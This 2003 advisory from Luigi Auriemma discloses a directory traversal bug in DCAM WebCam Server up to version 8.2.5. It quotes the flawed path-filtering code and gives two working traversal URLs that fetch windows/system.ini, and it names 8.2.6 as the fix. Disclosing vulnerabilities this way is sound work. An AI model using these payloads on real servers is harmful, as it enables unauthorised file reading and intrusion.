SecurityvulnsSECURITYVULNS:DOC:5565Directory traversal bug in DCAM server <= 8.2.5
#######################################################################
Luigi Auriemma
Application: DCAM WebCam server
http://www.hyperionx.com
http://sourceforge.net/projects/dcamserver/
Versions: <= 8.2.5
Platforms: Windows
Bug: Directory traversal bug
Risk: high
Exploitation: remote with browser
Date: 22 Dec 2003
Author: Luigi Auriemma
e-mail: [email protected]
web: http://aluigi.altervista.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
DCAM WebCam Server is an OpenSource program written in VisualBasic that
allows to capture live streaming video and to broadcast it on the web
through the built-in webserver.
#######################################################################
======
2) Bug
The webserver built into DCAM uses a protection to avoid the directory
traversal bug.
We can see it in Form1.frm:
…
880 page = Replace(page, "…", "")
881 page = Replace(page, "./", "")
882 page = Replace(page, "/.", "")
883 page = Replace(page, "//", "")
884 page = Replace(page, "\", "")
…
The problem happens when the attacker uses the pattern ".\" that
deceives the checks and allows him to see and download any file in the
remote system knowing the path.
#######################################################################
===========
3) The Code
http://server/.\.\.\.\/windows/system.ini
http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini
#######################################################################
======
4) Fix
Version 8.2.6
#######################################################################
Luigi Auriemma
http://aluigi.altervista.org